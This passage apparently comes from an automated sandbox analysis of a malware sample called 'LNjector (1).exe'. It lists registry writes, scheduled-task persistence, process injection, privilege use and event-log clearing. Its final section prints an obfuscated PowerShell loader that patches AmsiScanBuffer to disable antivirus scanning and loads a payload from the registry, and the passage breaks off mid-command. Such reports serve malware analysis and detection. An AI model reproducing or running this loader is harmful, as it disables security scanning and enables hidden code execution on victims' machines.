Set value (str)	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\Shell\{80213E82-BCFD-4C4F-8817-BB27601267A9}\Vid = "{137E7700-3573-11CF-AE69-08002B2E1262}"	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\Shell\{80213E82-BCFD-4C4F-8817-BB27601267A9}\Mode = "4"	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\Shell\{80213E82-BCFD-4C4F-8817-BB27601267A9}\Rev = "0"	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\Shell\{80213E82-BCFD-4C4F-8817-BB27601267A9}\GroupByDirection = "1"	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1\0\0\0\MRUListEx = 00000000ffffffff	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 0202	LNjector (1).exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1\NodeSlot = "2"	LNjector (1).exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02020202	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\Shell\{80213E82-BCFD-4C4F-8817-BB27601267A9}\LogicalViewMode = "1"	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1\0\0\0	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1\0\0\0\0\MRUListEx = ffffffff	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\NodeSlot = "1"	LNjector (1).exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\KnownFolderDerivedFolderType = "{885A186E-A440-4ADA-812B-DB871B942259}"	LNjector (1).exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000	LNjector (1).exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 010000000200000000000000ffffffff	Explorer.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\SniffedFolderType = "Downloads"	LNjector (1).exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\2 = 14002e80d43aad2469a5304598e1ab02f9417aa80000	LNjector (1).exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\Shell\{80213E82-BCFD-4C4F-8817-BB27601267A9}\GroupByKey:PID = "0"	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 020202020202	LNjector (1).exe
Key created	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU	LNjector (1).exe
Key created	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0	LNjector (1).exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02	LNjector (1).exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupByDirection = "1"	LNjector (1).exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\Shell\{80213E82-BCFD-4C4F-8817-BB27601267A9}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000070000001800000030f125b7ef471a10a5f102608c9eebac0a000000f000000030f125b7ef471a10a5f102608c9eebac04000000a0000000e0cc8de8b3b7d111a9f000aa0060fa310600000080000000e0cc8de8b3b7d111a9f000aa0060fa31020000005000000030f125b7ef471a10a5f102608c9eebac0c00000080000000e0cc8de8b3b7d111a9f000aa0060fa31040000005000000030f125b7ef471a10a5f102608c9eebac0e000000a0000000	Explorer.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\SniffedFolderType = "Downloads"	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\Shell\{80213E82-BCFD-4C4F-8817-BB27601267A9}\Rev = "0"	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\Shell\{80213E82-BCFD-4C4F-8817-BB27601267A9}\GroupByKey:PID = "0"	Explorer.EXE

Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

pid	Process
3296	schtasks.exe
4732	schtasks.exe

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
3452	Explorer.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
3664	powershell.exe
3664	powershell.exe
4188	powershell.exe
4188	powershell.exe
456	powershell.exe
456	powershell.exe
1664	acc449ba-d046-4b86-956f-10f8d1ac6d73.exe
2180	03075cf2-9b61-4396-98c8-fd9cb959cfb9.exe
2180	03075cf2-9b61-4396-98c8-fd9cb959cfb9.exe
1664	acc449ba-d046-4b86-956f-10f8d1ac6d73.exe
2180	03075cf2-9b61-4396-98c8-fd9cb959cfb9.exe
1664	acc449ba-d046-4b86-956f-10f8d1ac6d73.exe
2180	03075cf2-9b61-4396-98c8-fd9cb959cfb9.exe
1664	acc449ba-d046-4b86-956f-10f8d1ac6d73.exe
2180	03075cf2-9b61-4396-98c8-fd9cb959cfb9.exe
1664	acc449ba-d046-4b86-956f-10f8d1ac6d73.exe
1664	acc449ba-d046-4b86-956f-10f8d1ac6d73.exe
2180	03075cf2-9b61-4396-98c8-fd9cb959cfb9.exe
2180	03075cf2-9b61-4396-98c8-fd9cb959cfb9.exe
1664	acc449ba-d046-4b86-956f-10f8d1ac6d73.exe
2180	03075cf2-9b61-4396-98c8-fd9cb959cfb9.exe
2180	03075cf2-9b61-4396-98c8-fd9cb959cfb9.exe
1664	acc449ba-d046-4b86-956f-10f8d1ac6d73.exe
2180	03075cf2-9b61-4396-98c8-fd9cb959cfb9.exe
2180	03075cf2-9b61-4396-98c8-fd9cb959cfb9.exe
1664	acc449ba-d046-4b86-956f-10f8d1ac6d73.exe
1664	acc449ba-d046-4b86-956f-10f8d1ac6d73.exe
2180	03075cf2-9b61-4396-98c8-fd9cb959cfb9.exe
1664	acc449ba-d046-4b86-956f-10f8d1ac6d73.exe
2180	03075cf2-9b61-4396-98c8-fd9cb959cfb9.exe
2180	03075cf2-9b61-4396-98c8-fd9cb959cfb9.exe
2180	03075cf2-9b61-4396-98c8-fd9cb959cfb9.exe
2180	03075cf2-9b61-4396-98c8-fd9cb959cfb9.exe
2180	03075cf2-9b61-4396-98c8-fd9cb959cfb9.exe
1664	acc449ba-d046-4b86-956f-10f8d1ac6d73.exe
2180	03075cf2-9b61-4396-98c8-fd9cb959cfb9.exe
1664	acc449ba-d046-4b86-956f-10f8d1ac6d73.exe
2180	03075cf2-9b61-4396-98c8-fd9cb959cfb9.exe
2180	03075cf2-9b61-4396-98c8-fd9cb959cfb9.exe
2180	03075cf2-9b61-4396-98c8-fd9cb959cfb9.exe
1664	acc449ba-d046-4b86-956f-10f8d1ac6d73.exe
1664	acc449ba-d046-4b86-956f-10f8d1ac6d73.exe
2180	03075cf2-9b61-4396-98c8-fd9cb959cfb9.exe
2180	03075cf2-9b61-4396-98c8-fd9cb959cfb9.exe
1664	acc449ba-d046-4b86-956f-10f8d1ac6d73.exe
1664	acc449ba-d046-4b86-956f-10f8d1ac6d73.exe
1664	acc449ba-d046-4b86-956f-10f8d1ac6d73.exe
1664	acc449ba-d046-4b86-956f-10f8d1ac6d73.exe
1664	acc449ba-d046-4b86-956f-10f8d1ac6d73.exe
1664	acc449ba-d046-4b86-956f-10f8d1ac6d73.exe
1664	acc449ba-d046-4b86-956f-10f8d1ac6d73.exe
1664	acc449ba-d046-4b86-956f-10f8d1ac6d73.exe
4604	powershell.EXE
4604	powershell.EXE
4604	powershell.EXE
1220	LNjector (1).exe
1220	LNjector (1).exe
4604	powershell.EXE
864	dllhost.exe
864	dllhost.exe
864	dllhost.exe
864	dllhost.exe
864	dllhost.exe
864	dllhost.exe

Suspicious behavior: GetForegroundWindowSpam 2 IoCs

pid	Process
1220	LNjector (1).exe
3452	Explorer.EXE

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 13 IoCs

pid	Process
4988	msedge.exe
4988	msedge.exe
4988	msedge.exe
4988	msedge.exe
4988	msedge.exe
4988	msedge.exe
4988	msedge.exe
4988	msedge.exe
4988	msedge.exe
4988	msedge.exe
4988	msedge.exe
4988	msedge.exe
4988	msedge.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	3664	powershell.exe
Token: SeDebugPrivilege	4188	powershell.exe
Token: SeDebugPrivilege	456	powershell.exe
Token: SeDebugPrivilege	2180	03075cf2-9b61-4396-98c8-fd9cb959cfb9.exe
Token: SeDebugPrivilege	1664	acc449ba-d046-4b86-956f-10f8d1ac6d73.exe
Token: SeDebugPrivilege	3684	$77non.exe
Token: SeDebugPrivilege	3684	$77non.exe
Token: SeDebugPrivilege	4008	$77oui.exe
Token: SeDebugPrivilege	4008	$77oui.exe
Token: SeDebugPrivilege	4604	powershell.EXE
Token: SeDebugPrivilege	1220	LNjector (1).exe
Token: SeDebugPrivilege	4604	powershell.EXE
Token: SeDebugPrivilege	864	dllhost.exe
Token: SeAssignPrimaryTokenPrivilege	2280	svchost.exe
Token: SeIncreaseQuotaPrivilege	2280	svchost.exe
Token: SeSecurityPrivilege	2280	svchost.exe
Token: SeTakeOwnershipPrivilege	2280	svchost.exe
Token: SeLoadDriverPrivilege	2280	svchost.exe
Token: SeSystemtimePrivilege	2280	svchost.exe
Token: SeBackupPrivilege	2280	svchost.exe
Token: SeRestorePrivilege	2280	svchost.exe
Token: SeShutdownPrivilege	2280	svchost.exe
Token: SeSystemEnvironmentPrivilege	2280	svchost.exe
Token: SeUndockPrivilege	2280	svchost.exe
Token: SeManageVolumePrivilege	2280	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	2280	svchost.exe
Token: SeIncreaseQuotaPrivilege	2280	svchost.exe
Token: SeSecurityPrivilege	2280	svchost.exe
Token: SeTakeOwnershipPrivilege	2280	svchost.exe
Token: SeLoadDriverPrivilege	2280	svchost.exe
Token: SeSystemtimePrivilege	2280	svchost.exe
Token: SeBackupPrivilege	2280	svchost.exe
Token: SeRestorePrivilege	2280	svchost.exe
Token: SeShutdownPrivilege	2280	svchost.exe
Token: SeSystemEnvironmentPrivilege	2280	svchost.exe
Token: SeUndockPrivilege	2280	svchost.exe
Token: SeManageVolumePrivilege	2280	svchost.exe
Token: SeAuditPrivilege	2568	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	2280	svchost.exe
Token: SeIncreaseQuotaPrivilege	2280	svchost.exe
Token: SeSecurityPrivilege	2280	svchost.exe
Token: SeTakeOwnershipPrivilege	2280	svchost.exe
Token: SeLoadDriverPrivilege	2280	svchost.exe
Token: SeSystemtimePrivilege	2280	svchost.exe
Token: SeBackupPrivilege	2280	svchost.exe
Token: SeRestorePrivilege	2280	svchost.exe
Token: SeShutdownPrivilege	2280	svchost.exe
Token: SeSystemEnvironmentPrivilege	2280	svchost.exe
Token: SeUndockPrivilege	2280	svchost.exe
Token: SeManageVolumePrivilege	2280	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	2280	svchost.exe
Token: SeIncreaseQuotaPrivilege	2280	svchost.exe
Token: SeSecurityPrivilege	2280	svchost.exe
Token: SeTakeOwnershipPrivilege	2280	svchost.exe
Token: SeLoadDriverPrivilege	2280	svchost.exe
Token: SeSystemtimePrivilege	2280	svchost.exe
Token: SeBackupPrivilege	2280	svchost.exe
Token: SeRestorePrivilege	2280	svchost.exe
Token: SeShutdownPrivilege	2280	svchost.exe
Token: SeSystemEnvironmentPrivilege	2280	svchost.exe
Token: SeUndockPrivilege	2280	svchost.exe
Token: SeManageVolumePrivilege	2280	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	2280	svchost.exe
Token: SeIncreaseQuotaPrivilege	2280	svchost.exe

Suspicious use of FindShellTrayWindow 45 IoCs

pid	Process
1220	LNjector (1).exe
1220	LNjector (1).exe
1220	LNjector (1).exe
4988	msedge.exe
4988	msedge.exe
4988	msedge.exe
4988	msedge.exe
4988	msedge.exe
4988	msedge.exe
4988	msedge.exe
4988	msedge.exe
4988	msedge.exe
4988	msedge.exe
4988	msedge.exe
4988	msedge.exe
4988	msedge.exe
4988	msedge.exe
4988	msedge.exe
4988	msedge.exe
4988	msedge.exe
4988	msedge.exe
4988	msedge.exe
4988	msedge.exe
4988	msedge.exe
4988	msedge.exe
4988	msedge.exe
4988	msedge.exe
4988	msedge.exe
4988	msedge.exe
4988	msedge.exe
4988	msedge.exe
4988	msedge.exe
4988	msedge.exe
4988	msedge.exe
4988	msedge.exe
4988	msedge.exe
4988	msedge.exe
4988	msedge.exe
3452	Explorer.EXE
3452	Explorer.EXE
3452	Explorer.EXE
3452	Explorer.EXE
3452	Explorer.EXE
3452	Explorer.EXE
3452	Explorer.EXE

Suspicious use of SendNotifyMessage 30 IoCs

pid	Process
4988	msedge.exe
4988	msedge.exe
4988	msedge.exe
4988	msedge.exe
4988	msedge.exe
4988	msedge.exe
4988	msedge.exe
4988	msedge.exe
4988	msedge.exe
4988	msedge.exe
4988	msedge.exe
4988	msedge.exe
4988	msedge.exe
4988	msedge.exe
4988	msedge.exe
4988	msedge.exe
4988	msedge.exe
4988	msedge.exe
4988	msedge.exe
4988	msedge.exe
4988	msedge.exe
4988	msedge.exe
4988	msedge.exe
4988	msedge.exe
3452	Explorer.EXE
3452	Explorer.EXE
3452	Explorer.EXE
3452	Explorer.EXE
3452	Explorer.EXE
3452	Explorer.EXE

Suspicious use of SetWindowsHookEx 7 IoCs

pid	Process
1220	LNjector (1).exe
3452	Explorer.EXE
3452	Explorer.EXE
1220	LNjector (1).exe
1220	LNjector (1).exe
3452	Explorer.EXE
3452	Explorer.EXE

Suspicious use of UnmapMainImage 1 IoCs

pid	Process
4216	RuntimeBroker.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1220 wrote to memory of 3664	1220	LNjector (1).exe	85
PID 1220 wrote to memory of 3664	1220	LNjector (1).exe	85
PID 1220 wrote to memory of 4188	1220	LNjector (1).exe	87
PID 1220 wrote to memory of 4188	1220	LNjector (1).exe	87
PID 1220 wrote to memory of 456	1220	LNjector (1).exe	89
PID 1220 wrote to memory of 456	1220	LNjector (1).exe	89
PID 1220 wrote to memory of 2180	1220	LNjector (1).exe	100
PID 1220 wrote to memory of 2180	1220	LNjector (1).exe	100
PID 1220 wrote to memory of 2180	1220	LNjector (1).exe	100
PID 1220 wrote to memory of 1664	1220	LNjector (1).exe	101
PID 1220 wrote to memory of 1664	1220	LNjector (1).exe	101
PID 1220 wrote to memory of 1664	1220	LNjector (1).exe	101
PID 2180 wrote to memory of 4564	2180	03075cf2-9b61-4396-98c8-fd9cb959cfb9.exe	107
PID 2180 wrote to memory of 4564	2180	03075cf2-9b61-4396-98c8-fd9cb959cfb9.exe	107
PID 2180 wrote to memory of 4564	2180	03075cf2-9b61-4396-98c8-fd9cb959cfb9.exe	107
PID 1664 wrote to memory of 4336	1664	acc449ba-d046-4b86-956f-10f8d1ac6d73.exe	106
PID 1664 wrote to memory of 4336	1664	acc449ba-d046-4b86-956f-10f8d1ac6d73.exe	106
PID 1664 wrote to memory of 4336	1664	acc449ba-d046-4b86-956f-10f8d1ac6d73.exe	106
PID 1664 wrote to memory of 748	1664	acc449ba-d046-4b86-956f-10f8d1ac6d73.exe	110
PID 1664 wrote to memory of 748	1664	acc449ba-d046-4b86-956f-10f8d1ac6d73.exe	110
PID 1664 wrote to memory of 748	1664	acc449ba-d046-4b86-956f-10f8d1ac6d73.exe	110
PID 2180 wrote to memory of 1984	2180	03075cf2-9b61-4396-98c8-fd9cb959cfb9.exe	111
PID 2180 wrote to memory of 1984	2180	03075cf2-9b61-4396-98c8-fd9cb959cfb9.exe	111
PID 2180 wrote to memory of 1984	2180	03075cf2-9b61-4396-98c8-fd9cb959cfb9.exe	111
PID 748 wrote to memory of 3688	748	cmd.exe	114
PID 748 wrote to memory of 3688	748	cmd.exe	114
PID 748 wrote to memory of 3688	748	cmd.exe	114
PID 1984 wrote to memory of 5108	1984	cmd.exe	115
PID 1984 wrote to memory of 5108	1984	cmd.exe	115
PID 1984 wrote to memory of 5108	1984	cmd.exe	115
PID 4336 wrote to memory of 4732	4336	cmd.exe	116
PID 4336 wrote to memory of 4732	4336	cmd.exe	116
PID 4336 wrote to memory of 4732	4336	cmd.exe	116
PID 4564 wrote to memory of 3296	4564	cmd.exe	117
PID 4564 wrote to memory of 3296	4564	cmd.exe	117
PID 4564 wrote to memory of 3296	4564	cmd.exe	117
PID 748 wrote to memory of 3684	748	cmd.exe	119
PID 748 wrote to memory of 3684	748	cmd.exe	119
PID 748 wrote to memory of 3684	748	cmd.exe	119
PID 1984 wrote to memory of 4008	1984	cmd.exe	120
PID 1984 wrote to memory of 4008	1984	cmd.exe	120
PID 1984 wrote to memory of 4008	1984	cmd.exe	120
PID 1220 wrote to memory of 3568	1220	LNjector (1).exe	122
PID 1220 wrote to memory of 3568	1220	LNjector (1).exe	122
PID 1220 wrote to memory of 3568	1220	LNjector (1).exe	122
PID 4604 wrote to memory of 864	4604	powershell.EXE	125
PID 4604 wrote to memory of 864	4604	powershell.EXE	125
PID 4604 wrote to memory of 864	4604	powershell.EXE	125
PID 4604 wrote to memory of 864	4604	powershell.EXE	125
PID 4604 wrote to memory of 864	4604	powershell.EXE	125
PID 4604 wrote to memory of 864	4604	powershell.EXE	125
PID 4604 wrote to memory of 864	4604	powershell.EXE	125
PID 4604 wrote to memory of 864	4604	powershell.EXE	125
PID 864 wrote to memory of 616	864	dllhost.exe	5
PID 864 wrote to memory of 668	864	dllhost.exe	7
PID 864 wrote to memory of 956	864	dllhost.exe	12
PID 864 wrote to memory of 332	864	dllhost.exe	13
PID 864 wrote to memory of 512	864	dllhost.exe	14
PID 864 wrote to memory of 1032	864	dllhost.exe	15
PID 864 wrote to memory of 1052	864	dllhost.exe	17
PID 864 wrote to memory of 1064	864	dllhost.exe	18
PID 864 wrote to memory of 1188	864	dllhost.exe	19
PID 864 wrote to memory of 1196	864	dllhost.exe	20
PID 864 wrote to memory of 1272	864	dllhost.exe	21

C:\Windows\system32\winlogon.exe
winlogon.exe
1⤵
PID:616
- C:\Windows\system32\dwm.exe
  "dwm.exe"
  2⤵
  PID:332
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{862db49a-8de5-443a-b369-0d7c4898acb2}
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:864

C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
1⤵
PID:668

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
1⤵
PID:956

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
1⤵
PID:512

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
1⤵
PID:1032

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
1⤵
PID:1052

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
1⤵
PID:1064

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
1⤵
- Indicator Removal: Clear Windows Event Logs
PID:1188

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
1⤵
- Drops file in System32 directory
PID:1196
- C:\Windows\system32\taskhostw.exe
  taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
  2⤵
  PID:2780
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:ScOnkZoxSpfQ{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$btoJuPlbEfpCGf,[Parameter(Position=1)][Type]$FFtcNRGNWO)$TMZlDHPZIXs=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+'f'+'l'+'e'+[Char](99)+''+[Char](116)+'e'+[Char](100)+''+'D'+''+[Char](101)+'l'+[Char](101)+''+[Char](103)+''+[Char](97)+''+[Char](116)+'e')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('In'+'M'+''+'e'+''+[Char](109)+'o'+'r'+''+[Char](121)+''+[Char](77)+''+'o'+'d'+[Char](117)+''+'l'+''+[Char](101)+'',$False).DefineType('M'+'y'+'D'+[Char](101)+''+[Char](108)+''+[Char](101)+''+[Char](103)+''+[Char](97)+''+'t'+''+[Char](101)+''+[Char](84)+''+[Char](121)+''+'p'+''+'e'+'',''+[Char](67)+'l'+[Char](97)+'s'+'s'+''+[Char](44)+''+'P'+''+[Char](117)+''+[Char](98)+'l'+'i'+''+[Char](99)+''+[Char](44)+'S'+'e'+''+'a'+'l'+'e'+''+[Char](100)+''+[Char](44)+''+[Char](65)+''+[Char](110)+'si'+[Char](67)+'l'+[Char](97)+''+'s'+''+[Char](115)+','+'A'+''+'u'+''+'t'+''+[Char](111)+''+'C'+'las'+[Char](115)+'',[MulticastDelegate]);$TMZlDHPZIXs.DefineConstructor(''+'R'+''+'T'+''+[Char](83)+''+[Char](112)+''+'e'+''+[Char](99)+''+'i'+'a'+[Char](108)+'Na'+'m'+''+[Char](101)+''+[Char](44)+''+[Char](72)+''+[Char](105)+''+[Char](100)+''+[Char](101)+''+[Char](66)+''+[Char](121)+''+[Char](83)+'i'+[Char](103)+''+[Char](44)+''+'P'+''+'u'+''+'b'+''+[Char](108)+''+[Char](105)+''+'c'+'',[Reflection.CallingConventions]::Standard,$btoJuPlbEfpCGf).SetImplementationFlags(''+'R'+'u'+[Char](110)+''+[Char](116)+''+[Char](105)+''+[Char](109)+''+[Char](101)+''+','+''+[Char](77)+'a'+[Char](110)+''+'a'+''+[Char](103)+''+[Char](101)+'d');$TMZlDHPZIXs.DefineMethod('I'+'n'+'v'+'o'+''+[Char](107)+'e',''+[Char](80)+''+'u'+''+'b'+''+'l'+''+'i'+''+[Char](99)+''+','+'Hid'+[Char](101)+''+[Char](66)+''+[Char](121)+''+[Char](83)+'i'+'g'+''+[Char](44)+''+'N'+'e'+[Char](119)+''+[Char](83)+''+[Char](108)+''+'o'+''+[Char](116)+',Vi'+'r'+'tual',$FFtcNRGNWO,$btoJuPlbEfpCGf).SetImplementationFlags(''+'R'+'u'+[Char](110)+''+'t'+''+[Char](105)+''+[Char](109)+''+'e'+','+[Char](77)+''+'a'+''+'n'+''+[Char](97)+''+[Char](103)+''+[Char](101)+''+[Char](100)+'');Write-Output $TMZlDHPZIXs.CreateType();}$eoPKOwALHIYvK=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+'y'+'s'+''+'t'+''+[Char](101)+''+[Char](109)+''+[Char](46)+''+[Char](100)+''+'l'+'l')}).GetType(''+[Char](77)+''+'i'+''+[Char](99)+''+[Char](114)+''+[Char](111)+'sof'+[Char](116)+''+[Char](46)+''+'W'+''+[Char](105)+'n'+[Char](51)+''+'2'+''+[Char](46)+''+[Char](85)+''+'n'+'s'+'a'+'fe'+[Char](78)+'a'+[Char](116)+''+'i'+'v'+[Char](101)+'M'+[Char](101)+''+'t'+''+'h'+''+'o'+''+[Char](100)+''+[Char](115)+'');$OqLrSpFGItSOfB=$eoPKOwALHIYvK.GetMethod(''+'G'+''+'e'+''+[Char](116)+''+'P'+'r'+[Char](111)+'c'+[Char](65)+''+'d'+''+[Char](100)+''+'r'+''+'e'+''+'s'+''+'s'+'',[Reflection.BindingFlags](''+[Char](80)+''+[Char](117)+'b'+[Char](108)+''+[Char](105)+'c'+','+'S'+'t'+''+[Char](97)+''+[Char](116)+''+[Char](105)+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$dUUrsGSCntdLXFaqmlO=ScOnkZoxSpfQ @([String])([IntPtr]);$FyIzlzpBVBUtVySSPVSwup=ScOnkZoxSpfQ @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$cgQrHFLhFBu=$eoPKOwALHIYvK.GetMethod(''+[Char](71)+''+[Char](101)+'t'+'M'+''+[Char](111)+''+[Char](100)+''+'u'+''+'l'+''+[Char](101)+''+'H'+''+[Char](97)+''+'n'+''+'d'+''+[Char](108)+'e').Invoke($Null,@([Object]('k'+'e'+''+'r'+''+[Char](110)+''+'e'+'l'+'3'+''+[Char](50)+''+[Char](46)+''+'d'+''+[Char](108)+''+[Char](108)+'')));$uhSxwQNHFuVlyK=$OqLrSpFGItSOfB.Invoke($Null,@([Object]$cgQrHFLhFBu,[Object](''+'L'+'o'+[Char](97)+''+[Char](100)+''+'L'+'ib'+[Char](114)+''+[Char](97)+''+'r'+''+'y'+''+'A'+'')));$YdqGbsFgCAqSSdZBE=$OqLrSpFGItSOfB.Invoke($Null,@([Object]$cgQrHFLhFBu,[Object](''+[Char](86)+''+'i'+'r'+[Char](116)+'u'+[Char](97)+'lP'+[Char](114)+''+[Char](111)+''+[Char](116)+''+[Char](101)+''+[Char](99)+''+'t'+'')));$kLjEiEc=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($uhSxwQNHFuVlyK,$dUUrsGSCntdLXFaqmlO).Invoke(''+[Char](97)+''+[Char](109)+''+[Char](115)+''+'i'+''+[Char](46)+''+'d'+''+[Char](108)+'l');$vDNLCxTGFXLfdVrlZ=$OqLrSpFGItSOfB.Invoke($Null,@([Object]$kLjEiEc,[Object](''+[Char](65)+''+'m'+''+'s'+''+'i'+'Sc'+[Char](97)+''+'n'+'B'+[Char](117)+''+'f'+''+'f'+''+[Char](101)+''+[Char](114)+'')));$CaUREfzhqS=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($YdqGbsFgCAqSSdZBE,$FyIzlzpBVBUtVySSPVSwup).Invoke($vDNLCxTGFXLfdVrlZ,[uint32]8,4,[ref]$CaUREfzhqS);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$vDNLCxTGFXLfdVrlZ,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($YdqGbsFgCAqSSdZBE,$FyIzlzpBVBUtVySSPVSwup).Invoke($vDNLCxTGFXLfdVrlZ,[uint32]8,0x20,[ref]$CaUREfzhqS);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenS